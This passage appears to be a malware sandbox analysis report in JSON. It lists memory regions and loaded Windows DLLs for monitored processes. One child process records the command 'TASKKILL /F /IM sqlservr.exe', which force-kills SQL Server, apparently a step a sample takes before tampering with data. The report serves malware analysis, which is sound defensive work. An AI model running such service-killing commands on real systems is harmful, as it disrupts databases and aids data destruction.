dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32047104, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_4186", "name": "private_0x0000000001e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 32047104, "timestamp": "00:01:32.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 33226751, "entry_point": 0, "filename": null, "id": "region_4187", "name": "private_0x0000000001f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 32964608, "timestamp": "00:01:32.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36044800, "type": "region", "version": 1 }, "end_va": 38989823, "entry_point": 36044800, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4188", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36044800, "timestamp": "00:01:32.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4189", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:32.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4190", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:32.140", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4191", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:32.140", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4192", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:32.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_4193", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:32.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_4194", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:32.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34144256, "type": "region", "version": 1 }, "end_va": 34406399, "entry_point": 0, "filename": null, "id": "region_4195", "name": "private_0x0000000002090000", "norm_filename": null, "region_type": "private_memory", "start_va": 34144256, "timestamp": "00:01:32.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34930687, "entry_point": 0, "filename": null, "id": "region_4196", "name": "private_0x0000000002110000", "norm_filename": null, "region_type": "private_memory", "start_va": 34668544, "timestamp": "00:01:32.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4197", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:32.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4198", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:32.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4199", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:32.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1783103488, "type": "region", "version": 1 }, "end_va": 1783717887, "entry_point": 1783232697, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4200", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1783103488, "timestamp": "00:01:32.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1786576896, "type": "region", "version": 1 }, "end_va": 1786675199, "entry_point": 1786581813, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4201", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1786576896, "timestamp": "00:01:32.197", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM sqlservr.exe /IM sqlservr.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_35", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 35, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4202", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:32.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4203", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:32.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4204", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:32.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4205", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:32.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4206", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:32.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_4207", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:32.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_4208", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:01:32.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 7929856, "type": "region", "version": 1 }, "end_va": 8019967, "entry_point": 7953545, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4209", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 7929856, "timestamp": "00:01:32.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4210", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:32.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4211", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:32.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4212", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:32.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4213", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:32.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4214", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:32.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4215", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:32.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4216", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:32.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4217", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:32.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4218", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:32.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_4219", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:32.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4220", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:32.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4221", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:32.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4222", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:32.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4223", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:32.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4224", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:32.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4225", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:32.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4226", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:32.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 1114112, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4227", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1114112, "timestamp": "00:01:32.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_4228", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:32.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 6684671, "entry_point": 0, "filename": null, "id": "region_4229", "name": "private_0x0000000000560000", "norm_filename": null, "region_type": "private_memory", "start_va": 5636096, "timestamp": "00:01:32.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787932671, "entry_point": 1786975182, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4230", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:32.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4231", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:32.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4232", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:32.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4233", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:32.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959063551, "entry_point": 1959006881, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4234", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:01:32.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959067648, "type": "region", "version": 1 }, "end_va": 1959104511, "entry_point": 1959073190, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4235", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1959067648, "timestamp": "00:01:32.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1959202815, "entry_point": 1959138048, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4236", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:01:32.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1959264256, "type": "region", "version": 1 }, "end_va": 1959317503, "entry_point": 1959268832, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4237", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959264256, "timestamp": "00:01:32.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1959329792, "type": "region", "version": 1 }, "end_va": 1959546879, "entry_point": 1959334869, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4238", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1959329792, "timestamp": "00:01:32.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4239", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:32.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4240", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:32.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4241", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:32.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4242", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:32.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4243", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:32.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4244", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:32.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4245", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:32.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ 